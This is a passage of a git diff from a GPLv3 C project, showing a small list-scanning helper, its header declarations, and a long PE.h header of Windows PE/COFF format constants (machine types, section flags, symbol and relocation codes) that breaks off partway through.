int trigger = 0;
|
||||
for (int i = 0; i < index; i++)
|
||||
{
|
||||
for (int j = 0; j < null_size_in_bytes; j++)
|
||||
if (((char *)list)[(i*null_size_in_bytes)+j] != 0) trigger = 1;
|
||||
if (trigger == 0) return -1;
|
||||
trigger = 0;
|
||||
}
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,5 @@
|
|||
//License: GPLv3.0
|
||||
/* this function tests for if index points behind
|
||||
* the terminating 0x00 element */
|
||||
int test_for_list_end(void *list, int index, int null_size_in_bytes);
|
||||
long align(long size, long align);
|
|
@ -0,0 +1,563 @@
|
|||
//License: GPLv3.0
|
||||
#ifndef PE_H
|
||||
#define PE_H
|
||||
#include <stdint.h>
|
||||
|
||||
#define IMAGE_DOS_SIGNATURE 0x5A4D // MZ
|
||||
#define IMAGE_NT_SIGNATURE 0x00004550 // PE00
|
||||
#define IMAGE_SIZEOF_FILE_HEADER 20
|
||||
#define IMAGE_FILE_EXECUTABLE_IMAGE 0x0002 // File is executable (i.e. no unresolved externel references).
|
||||
#define IMAGE_FILE_LINE_NUMS_STRIPPED 0x0004 // Line nunbers stripped from file.
|
||||
#define IMAGE_FILE_LOCAL_SYMS_STRIPPED 0x0008 // Local symbols stripped from file.
|
||||
#define IMAGE_FILE_AGGRESIVE_WS_TRIM 0x0010 // Agressively trim working set
|
||||
#define IMAGE_FILE_LARGE_ADDRESS_AWARE 0x0020 // App can handle >2gb addresses
|
||||
#define IMAGE_FILE_BYTES_REVERSED_LO 0x0080 // Bytes of machine word are reversed.
|
||||
#define IMAGE_FILE_32BIT_MACHINE 0x0100 // 32 bit word machine.
|
||||
#define IMAGE_FILE_DEBUG_STRIPPED 0x0200 // Debugging info stripped from file in .DBG file
|
||||
#define IMAGE_FILE_REMOVABLE_RUN_FROM_SWAP 0x0400 // If Image is on removable media, copy and run from the swap file.
|
||||
#define IMAGE_FILE_NET_RUN_FROM_SWAP 0x0800 // If Image is on Net, copy and run from the swap file.
|
||||
#define IMAGE_FILE_SYSTEM 0x1000 // System File.
|
||||
#define IMAGE_FILE_DLL 0x2000 // File is a DLL.
|
||||
#define IMAGE_FILE_UP_SYSTEM_ONLY 0x4000 // File should only be run on a UP machine
|
||||
#define IMAGE_FILE_BYTES_REVERSED_HI 0x8000 // Bytes of machine word are reversed.
|
||||
#define IMAGE_FILE_MACHINE_UNKNOWN 0
|
||||
#define IMAGE_FILE_MACHINE_I386 0x014c // Intel 386.
|
||||
#define IMAGE_FILE_MACHINE_R3000 0x0162 // MIPS little-endian, 0x160 big-endian
|
||||
#define IMAGE_FILE_MACHINE_R4000 0x0166 // MIPS little-endian
|
||||
#define IMAGE_FILE_MACHINE_WCEMIPSV2 0x0169 // MIPS little-endian WCE v2
|
||||
#define IMAGE_FILE_MACHINE_ALPHA 0x0184 // Alpha_AXP
|
||||
#define IMAGE_FILE_MACHINE_SH3 0x01a2 // SH3 little-endian
|
||||
#define IMAGE_FILE_MACHINE_SH3DSP 0x01a3
|
||||
#define IMAGE_FILE_MACHINE_SH3E 0x01a4 // SH3E little-endian
|
||||
#define IMAGE_FILE_MACHINE_SH4 0x01a6 // SH4 little-endian
|
||||
#define IMAGE_FILE_MACHINE_SH5 0x01a8 // SH5
|
||||
#define IMAGE_FILE_MACHINE_ARM 0x01c0 // ARM Little-Endian
|
||||
#define IMAGE_FILE_MACHINE_THUMB 0x01c2
|
||||
#define IMAGE_FILE_MACHINE_AM33 0x01d3
|
||||
#define IMAGE_FILE_MACHINE_POWERPC 0x01F0 // IBM PowerPC Little-Endian
|
||||
#define IMAGE_FILE_MACHINE_POWERPCFP 0x01f1
|
||||
#define IMAGE_FILE_MACHINE_IA64 0x0200 // Intel 64
|
||||
#define IMAGE_FILE_MACHINE_MIPS16 0x0266 // MIPS
|
||||
#define IMAGE_FILE_MACHINE_ALPHA64 0x0284 // ALPHA64
|
||||
#define IMAGE_FILE_MACHINE_MIPSFPU 0x0366 // MIPS
|
||||
#define IMAGE_FILE_MACHINE_MIPSFPU16 0x0466 // MIPS
|
||||
#define IMAGE_FILE_MACHINE_AXP64 IMAGE_FILE_MACHINE_ALPHA64
|
||||
#define IMAGE_FILE_MACHINE_TRICORE 0x0520 // Infineon
|
||||
#define IMAGE_FILE_MACHINE_CEF 0x0CEF
|
||||
#define IMAGE_FILE_MACHINE_EBC 0x0EBC // EFI Byte Code
|
||||
#define IMAGE_FILE_MACHINE_AMD64 0x8664 // AMD64 (K8)
|
||||
#define IMAGE_FILE_MACHINE_M32R 0x9041 // M32R little-endian
|
||||
#define IMAGE_FILE_MACHINE_CEE 0xC0EE
|
||||
#define IMAGE_NUMBEROF_DIRECTORY_ENTRIES 16
|
||||
#define IMAGE_NT_OPTIONAL_HDR32_MAGIC 0x10b
|
||||
#define IMAGE_NT_OPTIONAL_HDR64_MAGIC 0x20b
|
||||
#define IMAGE_ROM_OPTIONAL_HDR_MAGIC 0x107
|
||||
#define IMAGE_SUBSYSTEM_UNKNOWN 0 // Unknown subsystem.
|
||||
#define IMAGE_SUBSYSTEM_NATIVE 1 // Image doesn't require a subsystem.
|
||||
#define IMAGE_SUBSYSTEM_WINDOWS_GUI 2 // Image runs in the Windows GUI subsystem.
|
||||
#define IMAGE_SUBSYSTEM_WINDOWS_CUI 3 // Image runs in the Windows character subsystem.
|
||||
#define IMAGE_SUBSYSTEM_OS2_CUI 5 // image runs in the OS/2 character subsystem.
|
||||
#define IMAGE_SUBSYSTEM_POSIX_CUI 7 // image runs in the Posix character subsystem.
|
||||
#define IMAGE_SUBSYSTEM_NATIVE_WINDOWS 8 // image is a native Win9x driver.
|
||||
#define IMAGE_SUBSYSTEM_WINDOWS_CE_GUI 9 // Image runs in the Windows CE subsystem.
|
||||
#define IMAGE_SUBSYSTEM_EFI_APPLICATION 10 //
|
||||
#define IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER 11 //
|
||||
#define IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER 12 //
|
||||
#define IMAGE_SUBSYSTEM_EFI_ROM 13
|
||||
#define IMAGE_SUBSYSTEM_XBOX 14
|
||||
#define IMAGE_SUBSYSTEM_WINDOWS_BOOT_APPLICATION 16
|
||||
#define IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE 0x0040 // DLL can move.
|
||||
#define IMAGE_DLLCHARACTERISTICS_FORCE_INTEGRITY 0x0080 // Code Integrity Image
|
||||
#define IMAGE_DLLCHARACTERISTICS_NX_COMPAT 0x0100 // Image is NX compatible
|
||||
#define IMAGE_DLLCHARACTERISTICS_NO_ISOLATION 0x0200 // Image understands isolation and doesn't want it
|
||||
#define IMAGE_DLLCHARACTERISTICS_NO_SEH 0x0400 // Image does not use SEH. No SE handler may reside in this image
|
||||
#define IMAGE_DLLCHARACTERISTICS_NO_BIND 0x0800 // Do not bind this image.
|
||||
#define IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE 0x8000
|
||||
#define IMAGE_DIRECTORY_ENTRY_EXPORT 0 // Export Directory
|
||||
#define IMAGE_DIRECTORY_ENTRY_IMPORT 1 // Import Directory
|
||||
#define IMAGE_DIRECTORY_ENTRY_RESOURCE 2 // Resource Directory
|
||||
#define IMAGE_DIRECTORY_ENTRY_EXCEPTION 3 // Exception Directory
|
||||
#define IMAGE_DIRECTORY_ENTRY_SECURITY 4 // Security Directory
|
||||
#define IMAGE_DIRECTORY_ENTRY_BASERELOC 5 // Base Relocation Table
|
||||
#define IMAGE_DIRECTORY_ENTRY_DEBUG 6 // Debug Directory
|
||||
#define IMAGE_DIRECTORY_ENTRY_ARCHITECTURE 7 // Architecture Specific Data
|
||||
#define IMAGE_DIRECTORY_ENTRY_GLOBALPTR 8 // RVA of GP
|
||||
#define IMAGE_DIRECTORY_ENTRY_TLS 9 // TLS Directory
|
||||
#define IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG 10 // Load Configuration Directory
|
||||
#define IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT 11 // Bound Import Directory in headers
|
||||
#define IMAGE_DIRECTORY_ENTRY_IAT 12 // Import Address Table
|
||||
#define IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT 13 // Delay Load Import Descriptors
|
||||
#define IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR 14 // COM Runtime descriptor
|
||||
#define IMAGE_SIZEOF_SHORT_NAME 8
|
||||
#define IMAGE_SIZEOF_SECTION_HEADER 40
|
||||
#define IMAGE_SCN_TYPE_NO_PAD 0x00000008 // Reserved.
|
||||
#define IMAGE_SCN_CNT_CODE 0x00000020 // Section contains code.
|
||||
#define IMAGE_SCN_CNT_INITIALIZED_DATA 0x00000040 // Section contains initialized data.
|
||||
#define IMAGE_SCN_CNT_UNINITIALIZED_DATA 0x00000080 // Section contains uninitialized data.
|
||||
#define IMAGE_SCN_LNK_OTHER 0x00000100 // Reserved.
|
||||
#define IMAGE_SCN_LNK_INFO 0x00000200 // Section contains comments or some other type of information.
|
||||
#define IMAGE_SCN_LNK_REMOVE 0x00000800 // Section contents will not become part of image.
|
||||
#define IMAGE_SCN_LNK_COMDAT 0x00001000 // Section contents comdat.
|
||||
#define IMAGE_SCN_NO_DEFER_SPEC_EXC 0x00004000 // Reset speculative exceptions handling bits in the TLB entries for this section.
|
||||
#define IMAGE_SCN_GPREL 0x00008000 // Section content can be accessed relative to GP
|
||||
#define IMAGE_SCN_MEM_FARDATA 0x00008000
|
||||
#define IMAGE_SCN_MEM_PURGEABLE 0x00020000
|
||||
#define IMAGE_SCN_MEM_16BIT 0x00020000
|
||||
#define IMAGE_SCN_MEM_LOCKED 0x00040000
|
||||
#define IMAGE_SCN_MEM_PRELOAD 0x00080000
|
||||
#define IMAGE_SCN_ALIGN_1BYTES 0x00100000 //
|
||||
#define IMAGE_SCN_ALIGN_2BYTES 0x00200000 //
|
||||
#define IMAGE_SCN_ALIGN_4BYTES 0x00300000 //
|
||||
#define IMAGE_SCN_ALIGN_8BYTES 0x00400000 //
|
||||
#define IMAGE_SCN_ALIGN_16BYTES 0x00500000 // Default alignment if no others are specified.
|
||||
#define IMAGE_SCN_ALIGN_32BYTES 0x00600000 //
|
||||
#define IMAGE_SCN_ALIGN_64BYTES 0x00700000 //
|
||||
#define IMAGE_SCN_ALIGN_128BYTES 0x00800000 //
|
||||
#define IMAGE_SCN_ALIGN_256BYTES 0x00900000 //
|
||||
#define IMAGE_SCN_ALIGN_512BYTES 0x00A00000 //
|
||||
#define IMAGE_SCN_ALIGN_1024BYTES 0x00B00000 //
|
||||
#define IMAGE_SCN_ALIGN_2048BYTES 0x00C00000 //
|
||||
#define IMAGE_SCN_ALIGN_4096BYTES 0x00D00000 //
|
||||
#define IMAGE_SCN_ALIGN_8192BYTES 0x00E00000 //
|
||||
#define IMAGE_SCN_ALIGN_MASK 0x00F00000
|
||||
#define IMAGE_SCN_LNK_NRELOC_OVFL 0x01000000 // Section contains extended relocations.
|
||||
#define IMAGE_SCN_MEM_DISCARDABLE 0x02000000 // Section can be discarded.
|
||||
#define IMAGE_SCN_MEM_NOT_CACHED 0x04000000 // Section is not cachable.
|
||||
#define IMAGE_SCN_MEM_NOT_PAGED 0x08000000 // Section is not pageable.
|
||||
#define IMAGE_SCN_MEM_SHARED 0x10000000 // Section is shareable.
|
||||
#define IMAGE_SCN_MEM_EXECUTE 0x20000000 // Section is executable.
|
||||
#define IMAGE_SCN_MEM_READ 0x40000000 // Section is readable.
|
||||
#define IMAGE_SCN_MEM_WRITE 0x80000000 // Section is writeable.
|
||||
#define IMAGE_SCN_SCALE_INDEX 0x00000001 // Tls index is scaled
|
||||
#define IMAGE_SIZEOF_SYMBOL 18
|
||||
#define IMAGE_SYM_TYPE_NULL 0x0000 // no type.
|
||||
#define IMAGE_SYM_TYPE_VOID 0x0001 //
|
||||
#define IMAGE_SYM_TYPE_CHAR 0x0002 // type character.
|
||||
#define IMAGE_SYM_TYPE_SHORT 0x0003 // type short integer.
|
||||
#define IMAGE_SYM_TYPE_INT 0x0004 //
|
||||
#define IMAGE_SYM_TYPE_LONG 0x0005 //
|
||||
#define IMAGE_SYM_TYPE_FLOAT 0x0006 //
|
||||
#define IMAGE_SYM_TYPE_DOUBLE 0x0007 //
|
||||
#define IMAGE_SYM_TYPE_STRUCT 0x0008 //
|
||||
#define IMAGE_SYM_TYPE_UNION 0x0009 //
|
||||
#define IMAGE_SYM_TYPE_ENUM 0x000A // enumeration.
|
||||
#define IMAGE_SYM_TYPE_MOE 0x000B // member of enumeration.
|
||||
#define IMAGE_SYM_TYPE_BYTE 0x000C //
|
||||
#define IMAGE_SYM_TYPE_WORD 0x000D //
|
||||
#define IMAGE_SYM_TYPE_UINT 0x000E //
|
||||
#define IMAGE_SYM_TYPE_DWORD 0x000F //
|
||||
#define IMAGE_SYM_TYPE_PCODE 0x8000 //
|
||||
#define IMAGE_SYM_DTYPE_NULL 0 // no derived type.
|
||||
#define IMAGE_SYM_DTYPE_POINTER 1 // pointer.
|
||||
#define IMAGE_SYM_DTYPE_FUNCTION 2 // function.
|
||||
#define IMAGE_SYM_DTYPE_ARRAY 3 // array.
|
||||
#define IMAGE_SYM_CLASS_NULL 0x0000
|
||||
#define IMAGE_SYM_CLASS_AUTOMATIC 0x0001
|
||||
#define IMAGE_SYM_CLASS_EXTERNAL 0x0002
|
||||
#define IMAGE_SYM_CLASS_STATIC 0x0003
|
||||
#define IMAGE_SYM_CLASS_REGISTER 0x0004
|
||||
#define IMAGE_SYM_CLASS_EXTERNAL_DEF 0x0005
|
||||
#define IMAGE_SYM_CLASS_LABEL 0x0006
|
||||
#define IMAGE_SYM_CLASS_UNDEFINED_LABEL 0x0007
|
||||
#define IMAGE_SYM_CLASS_MEMBER_OF_STRUCT 0x0008
|
||||
#define IMAGE_SYM_CLASS_ARGUMENT 0x0009
|
||||
#define IMAGE_SYM_CLASS_STRUCT_TAG 0x000A
|
||||
#define IMAGE_SYM_CLASS_MEMBER_OF_UNION 0x000B
|
||||
#define IMAGE_SYM_CLASS_UNION_TAG 0x000C
|
||||
#define IMAGE_SYM_CLASS_TYPE_DEFINITION 0x000D
|
||||
#define IMAGE_SYM_CLASS_UNDEFINED_STATIC 0x000E
|
||||
#define IMAGE_SYM_CLASS_ENUM_TAG 0x000F
|
||||
#define IMAGE_SYM_CLASS_MEMBER_OF_ENUM 0x0010
|
||||
#define IMAGE_SYM_CLASS_REGISTER_PARAM 0x0011
|
||||
#define IMAGE_SYM_CLASS_BIT_FIELD 0x0012
|
||||
#define IMAGE_SYM_CLASS_FAR_EXTERNAL 0x0044 //
|
||||
#define IMAGE_SYM_CLASS_BLOCK 0x0064
|
||||
#define IMAGE_SYM_CLASS_FUNCTION 0x0065
|
||||
#define IMAGE_SYM_CLASS_END_OF_STRUCT 0x0066
|
||||
#define IMAGE_SYM_CLASS_FILE 0x0067
|
||||
#define IMAGE_SYM_CLASS_SECTION 0x0068
|
||||
#define IMAGE_SYM_CLASS_WEAK_EXTERNAL 0x0069
|
||||
#define IMAGE_SYM_CLASS_CLR_TOKEN 0x006B
|
||||
#define IMAGE_REL_I386_ABSOLUTE 0x0000 // Reference is absolute, no relocation is necessary
|
||||
#define IMAGE_REL_I386_DIR16 0x0001 // Direct 16-bit reference to the symbols virtual address
|
||||
#define IMAGE_REL_I386_REL16 0x0002 // PC-relative 16-bit reference to the symbols virtual address
|
||||
#define IMAGE_REL_I386_DIR32 0x0006 // Direct 32-bit reference to the symbols virtual address
|
||||
#define IMAGE_REL_I386_DIR32NB 0x0007 // Direct 32-bit reference to the symbols virtual address, base not included
|
||||
#define IMAGE_REL_I386_SEG12 0x0009 // Direct 16-bit reference to the segment-selector bits of a 32-bit virtual address
|
||||
#define IMAGE_REL_I386_SECTION 0x000A
|
||||
#define IMAGE_REL_I386_SECREL 0x000B
|
||||
#define IMAGE_REL_I386_TOKEN 0x000C // clr token
|
||||
#define IMAGE_REL_I386_SECREL7 0x000D // 7 bit offset from base of section containing target
|
||||
#define IMAGE_REL_I386_REL32 0x0014 // PC-relative 32-bit reference to the symbols virtual address
|
||||
#define IMAGE_REL_MIPS_ABSOLUTE 0x0000 // Reference is absolute, no relocation is necessary
|
||||
#define IMAGE_REL_MIPS_REFHALF 0x0001
|
||||
#define IMAGE_REL_MIPS_REFWORD 0x0002
|
||||
#define IMAGE_REL_MIPS_JMPADDR 0x0003
|
||||
#define IMAGE_REL_MIPS_REFHI 0x0004
|
||||
#define IMAGE_REL_MIPS_REFLO 0x0005
|
||||
#define IMAGE_REL_MIPS_GPREL 0x0006
|
||||
#define IMAGE_REL_MIPS_LITERAL 0x0007
|
||||
#define IMAGE_REL_MIPS_SECTION 0x000A
|
||||
#define IMAGE_REL_MIPS_SECREL 0x000B
|
||||
#define IMAGE_REL_MIPS_SECRELLO 0x000C // Low 16-bit section relative referemce (used for >32k TLS)
|
||||
#define IMAGE_REL_MIPS_SECRELHI 0x000D // High 16-bit section relative reference (used for >32k TLS)
|
||||
#define IMAGE_REL_MIPS_TOKEN 0x000E // clr token
|
||||
#define IMAGE_REL_MIPS_JMPADDR16 0x0010
|
||||
#define IMAGE_REL_MIPS_REFWORDNB 0x0022
|
||||
#define IMAGE_REL_MIPS_PAIR 0x0025
|
||||
#define IMAGE_REL_ALPHA_ABSOLUTE 0x0000
|
||||
#define IMAGE_REL_ALPHA_REFLONG 0x0001
|
||||
#define IMAGE_REL_ALPHA_REFQUAD 0x0002
|
||||
#define IMAGE_REL_ALPHA_GPREL32 0x0003
|
||||
#define IMAGE_REL_ALPHA_LITUSE 0x0005
|
||||
#define IMAGE_REL_ALPHA_GPDISP 0x0006
|
||||
#define IMAGE_REL_ALPHA_BRADDR 0x0007
|
||||
#define IMAGE_REL_ALPHA_HINT 0x0008
|
||||
#define IMAGE_REL_ALPHA_INLINE_REFLONG 0x0009
|
||||
#define IMAGE_REL_ALPHA_REFHI 0x000A
|
||||
#define IMAGE_REL_ALPHA_REFLO 0x000B
|
||||
#define IMAGE_REL_ALPHA_PAIR 0x000C
|
||||
#define IMAGE_REL_ALPHA_MATCH 0x000D
|
||||
#define IMAGE_REL_ALPHA_SECTION 0x000E
|
||||
#define IMAGE_REL_ALPHA_SECREL 0x000F
|
||||
#define IMAGE_REL_ALPHA_REFLONGNB 0x0010
|
||||
#define IMAGE_REL_ALPHA_SECRELLO 0x0011 // Low 16-bit section relative reference
|
||||
#define IMAGE_REL_ALPHA_SECRELHI 0x0012 // High 16-bit section relative reference
|
||||
#define IMAGE_REL_ALPHA_REFQ3 0x0013 // High 16 bits of 48 bit reference
|
||||
#define IMAGE_REL_ALPHA_REFQ2 0x0014 // Middle 16 bits of 48 bit reference
|
||||
#define IMAGE_REL_ALPHA_REFQ1 0x0015 // Low 16 bits of 48 bit reference
|
||||
#define IMAGE_REL_ALPHA_GPRELLO 0x0016 // Low 16-bit GP relative reference
|
||||
#define IMAGE_REL_ALPHA_GPRELHI 0x0017 // High 16-bit GP relative reference
|
||||
#define IMAGE_REL_PPC_ABSOLUTE 0x0000 // NOP
|
||||
#define IMAGE_REL_PPC_ADDR64 0x0001 // 64-bit address
|
||||
#define IMAGE_REL_PPC_ADDR32 0x0002 // 32-bit address
|
||||
#define IMAGE_REL_PPC_ADDR24 0x0003 // 26-bit address, shifted left 2 (branch absolute)
|
||||
#define IMAGE_REL_PPC_ADDR16 0x0004 // 16-bit address
|
||||
#define IMAGE_REL_PPC_REL24 0x0006 // 26-bit PC-relative offset, shifted left 2 (branch relative)
|
||||
#define IMAGE_REL_PPC_REL14 0x0007 // 16-bit PC-relative offset, shifted left 2 (br cond relative)
|
||||
#define IMAGE_REL_PPC_TOCREL16 0x0008 // 16-bit offset from TOC base
|
||||
#define IMAGE_REL_PPC_ADDR32NB 0x000A // 32-bit addr w/o image base
|
||||
#define IMAGE_REL_PPC_SECREL 0x000B // va of containing section (as in an image sectionhdr)
|
||||
#define IMAGE_REL_PPC_SECTION 0x000C // sectionheader number
|
||||
#define IMAGE_REL_PPC_IFGLUE 0x000D // substitute TOC restore instruction iff symbol is glue code
|
||||
#define IMAGE_REL_PPC_SECREL16 0x000F // va of containing section (limited to 16 bits)
|
||||
#define IMAGE_REL_PPC_REFLO 0x0011
|
||||
#define IMAGE_REL_PPC_PAIR 0x0012
|
||||
#define IMAGE_REL_PPC_SECRELHI 0x0014 // High 16-bit section relative reference (used for >32k TLS)
|
||||
#define IMAGE_REL_PPC_GPREL 0x0015
|
||||
#define IMAGE_REL_PPC_TOKEN 0x0016 // clr token
|
||||
#define IMAGE_REL_PPC_NEG 0x0100 // subtract reloc value rather than adding it
|
||||
#define IMAGE_REL_PPC_BRTAKEN 0x0200 // fix branch prediction bit to predict branch taken
|
||||
#define IMAGE_REL_PPC_BRNTAKEN 0x0400 // fix branch prediction bit to predict branch not taken
|
||||
#define IMAGE_REL_PPC_TOCDEFN 0x0800 // toc slot defined in file (or, data in toc)
|
||||
#define IMAGE_REL_SH3_DIRECT16 0x0001 // 16 bit direct
|
||||
#define IMAGE_REL_SH3_DIRECT32 0x0002 // 32 bit direct
|
||||
#define IMAGE_REL_SH3_DIRECT8_WORD 0x0004 // 8 bit direct .W (0 ext.)
|
||||
#define IMAGE_REL_SH3_DIRECT8_LONG 0x0005 // 8 bit direct .L (0 ext.)
|
||||
#define IMAGE_REL_SH3_DIRECT4 0x0006 // 4 bit direct (0 ext.)
|
||||
#define IMAGE_REL_SH3_DIRECT4_WORD 0x0007 // 4 bit direct .W (0 ext.)
|
||||
#define IMAGE_REL_SH3_PCREL8_WORD 0x0009 // 8 bit PC relative .W
|
||||
#define IMAGE_REL_SH3_PCREL8_LONG 0x000A // 8 bit PC relative .L
|
||||
#define IMAGE_REL_SH3_PCREL12_WORD 0x000B // 12 LSB PC relative .W
|
||||
#define IMAGE_REL_SH3_SIZEOF_SECTION 0x000D // Size of EXE section
|
||||
#define IMAGE_REL_SH3_SECTION 0x000E // Section table index
|
||||
#define IMAGE_REL_SH3_SECREL 0x000F // Offset within section
|
||||
#define IMAGE_REL_SH3_DIRECT32_NB 0x0010 // 32 bit direct not based
|
||||
#define IMAGE_REL_SH3_GPREL4_LONG 0x0011 // GP-relative addressing
|
||||
#define IMAGE_REL_SH3_TOKEN 0x0012 // clr token
|
||||
#define IMAGE_REL_SHM_PCRELPT 0x0013 // Offset from current
|
||||
#define IMAGE_REL_SHM_REFLO 0x0014 // Low bits of 32-bit address
|
||||
#define IMAGE_REL_SHM_REFHALF 0x0015 // High bits of 32-bit address
|
||||
#define IMAGE_REL_SHM_RELLO 0x0016 // Low bits of relative reference
|
||||
#define IMAGE_REL_SHM_RELHALF 0x0017 // High bits of relative reference
|
||||
#define IMAGE_REL_SHM_PAIR 0x0018 // offset operand for relocation
|
||||
#define IMAGE_REL_SH_NOMODE 0x8000 // relocation ignores section mode
|
||||
#define IMAGE_REL_ARM_ABSOLUTE 0x0000 // No relocation required
|
||||
#define IMAGE_REL_ARM_ADDR32 0x0001 // 32 bit address
|
||||
#define IMAGE_REL_ARM_ADDR32NB 0x0002 // 32 bit address w/o image base
|
||||
#define IMAGE_REL_ARM_BRANCH24 0x0003 // 24 bit offset << 2 & sign ext.
|
||||
#define IMAGE_REL_ARM_BRANCH11 0x0004 // Thumb: 2 11 bit offsets
|
||||
#define IMAGE_REL_ARM_TOKEN 0x0005 // clr token
|
||||
#define IMAGE_REL_ARM_GPREL7 0x0007 // GP-relative addressing (Thumb)
|
||||
#define IMAGE_REL_ARM_BLX24 0x0008
|
||||
#define IMAGE_REL_ARM_BLX11 0x0009
|
||||
#define IMAGE_REL_ARM_SECREL 0x000F // Offset within section
|
||||
#define IMAGE_REL_AM_ABSOLUTE 0x0000
|
||||
#define IMAGE_REL_AM_ADDR32NB 0x0002
|
||||
#define IMAGE_REL_AM_FUNCINFO 0x0004
|
||||
#define IMAGE_REL_AM_REL32_1 0x0005
|
||||
#define IMAGE_REL_AM_REL32_2 0x0006
|
||||
#define IMAGE_REL_AM_SECTION 0x0008
|
||||
#define IMAGE_REL_AM_TOKEN 0x0009
|
||||
#define IMAGE_REL_AMD64_ADDR64 0x0001 // 64-bit address (VA).
|
||||
#define IMAGE_REL_AMD64_ADDR32 0x0002 // 32-bit address (VA).
|
||||
#define IMAGE_REL_AMD64_REL32 0x0004 // 32-bit relative address from byte following reloc
|
||||
#define IMAGE_REL_AMD64_REL32_1 0x0005 // 32-bit relative address from byte distance 1 from reloc
|
||||
#define IMAGE_REL_AMD64_REL32_3 0x0007 // 32-bit relative address from byte distance 3 from reloc
|
||||
#define IMAGE_REL_AMD64_REL32_5 0x0009 // 32-bit relative address from byte distance 5 from reloc
|
||||
#define IMAGE_REL_AMD64_SECREL 0x000B // 32 bit offset from base of section containing target
|
||||
#define IMAGE_REL_AMD64_SECREL7 0x000C // 7 bit unsigned offset from base of section containing target
|
||||
#define IMAGE_REL_AMD64_SREL32 0x000E // 32 bit signed span-dependent value emitted into object
|
||||
#define IMAGE_REL_AMD64_SSPAN32 0x0010 // 32 bit signed span-dependent value applied at link time
|
||||
#define IMAGE_REL_IA64_IMM14 0x0001
|
||||
#define IMAGE_REL_IA64_IMM64 0x0003
|
||||
#define IMAGE_REL_IA64_DIR32 0x0004
|
||||
#define IMAGE_REL_IA64_PCREL21B 0x0006
|
||||
#define IMAGE_REL_IA64_PCREL21F 0x0008
|
||||
#define IMAGE_REL_IA64_LTOFF22 0x000A
|
||||
#define IMAGE_REL_IA64_SECTION 0x000B
|
||||
#define IMAGE_REL_IA64_SECREL22 0x000C
|
||||
#define IMAGE_REL_IA64_SECREL64I 0x000D
|
||||
#define IMAGE_REL_IA64_SECREL32 0x000E
|
||||
#define IMAGE_REL_IA64_DIR32NB 0x0010
|
||||
#define IMAGE_REL_IA64_SREL22 0x0012
|
||||
#define IMAGE_REL_IA64_SREL32 0x0013
|
||||
#define IMAGE_REL_IA64_UREL32 0x0014
|
||||
#define IMAGE_REL_IA64_PCREL60B 0x0016 // If possible, convert to MBB bundle with NOP.B in slot 1
|
||||
#define IMAGE_REL_IA64_PCREL60F 0x0017 // If possible, convert to MFB bundle with NOP.F in slot 1
|
||||
#define IMAGE_REL_IA64_PCREL60I 0x0018 // If possible, convert to MIB bundle with NOP.I in slot 1
|
||||
#define IMAGE_REL_IA64_PCREL60M 0x0019 // If possible, convert to MMB bundle with NOP.M in slot 1
|
||||
#define IMAGE_REL_IA64_IMMGPREL64 0x001A
|
||||
#define IMAGE_REL_IA64_TOKEN 0x001B // clr token
|
||||
#define IMAGE_REL_IA64_GPREL32 0x001C
|
||||
#define IMAGE_REL_IA64_ADDEND 0x001F
|
||||
#define IMAGE_REL_CEF_ABSOLUTE 0x0000 // Reference is absolute, no relocation is necessary
|
||||
#define IMAGE_REL_CEF_ADDR64 0x0002 // 64-bit address (VA).
|
||||
#define IMAGE_REL_CEF_ADDR32NB 0x0003 // 32-bit address w/o image base (RVA).
|
||||
#define IMAGE_REL_CEF_SECTION 0x0004 // Section index
|
||||
#define IMAGE_REL_CEF_TOKEN 0x0006 // 32 bit metadata token
|
||||
#define IMAGE_REL_CEE_ABSOLUTE 0x0000 // Reference is absolute, no relocation is necessary
|
||||
#define IMAGE_REL_CEE_ADDR32 0x0001 // 32-bit address (VA).
|
||||
#define IMAGE_REL_CEE_ADDR64 0x0002 // 64-bit address (VA).
|
||||
#define IMAGE_REL_CEE_ADDR32NB 0x0003 // 32-bit address w/o image base (RVA).
|
||||
#define IMAGE_REL_CEE_SECREL 0x0005 // 32 bit offset from base of section containing target
|
||||
#define IMAGE_REL_CEE_TOKEN 0x0006 // 32 bit metadata token
|
||||
#define IMAGE_REL_M32R_ADDR32 0x0001 // 32 bit address
|
||||
#define IMAGE_REL_M32R_ADDR32NB 0x0002 // 32 bit address w/o image base
|
||||
#define IMAGE_REL_M32R_ADDR24 0x0003 // 24 bit address
|
||||
#define IMAGE_REL_M32R_PCREL24 0x0005 // 24 bit offset << 2 & sign ext.
|
||||
#define IMAGE_REL_M32R_PCREL8 0x0007 // 8 bit offset << 2 & sign ext.
|
||||
#define IMAGE_REL_M32R_REFHALF 0x0008 // 16 MSBs
|
||||
#define IMAGE_REL_M32R_REFHI 0x0009 // 16 MSBs; adj for LSB sign ext.
|
||||
#define IMAGE_REL_M32R_REFLO 0x000A // 16 LSBs
|
||||
#define IMAGE_REL_M32R_PAIR 0x000B // Link HI and LO
|
||||
#define IMAGE_REL_M32R_SECTION 0x000C // Section table index
|
||||
#define IMAGE_REL_M32R_SECREL32 0x000D // 32 bit section relative reference
|
||||
#define IMAGE_REL_M32R_TOKEN 0x000E // clr token
|
||||
#define IMAGE_REL_EBC_ABSOLUTE 0x0000 // No relocation required
|
||||
#define IMAGE_REL_EBC_ADDR32NB 0x0001 // 32 bit address w/o image base
|
||||
#define IMAGE_REL_EBC_REL32 0x0002 // 32-bit relative address from byte following reloc
|
||||
#define IMAGE_REL_EBC_SECTION 0x0003 // Section table index
|
||||
#define IMAGE_REL_EBC_SECREL 0x0004 // Offset within section
|
||||
#define IMAGE_REL_BASED_ABSOLUTE 0
|
||||
#define IMAGE_REL_BASED_LOW 2
|
||||
#define IMAGE_REL_BASED_HIGHLOW 3
|
||||
#define IMAGE_REL_BASED_HIGHADJ 4
|
||||
#define IMAGE_REL_BASED_MIPS_JMPADDR 5
|
||||
#define IMAGE_REL_BASED_MIPS_JMPADDR16 9
|
||||
#define IMAGE_REL_BASED_DIR64 10
|
||||
#define IMAGE_ARCHIVE_START "!<arch>\n"
|
||||
#define IMAGE_ARCHIVE_PAD "\n"
|
||||
#define IMAGE_ARCHIVE_LINKER_MEMBER "/ "
|
||||
#define IMAGE_ARCHIVE_LONGNAMES_MEMBER "// "
|
||||
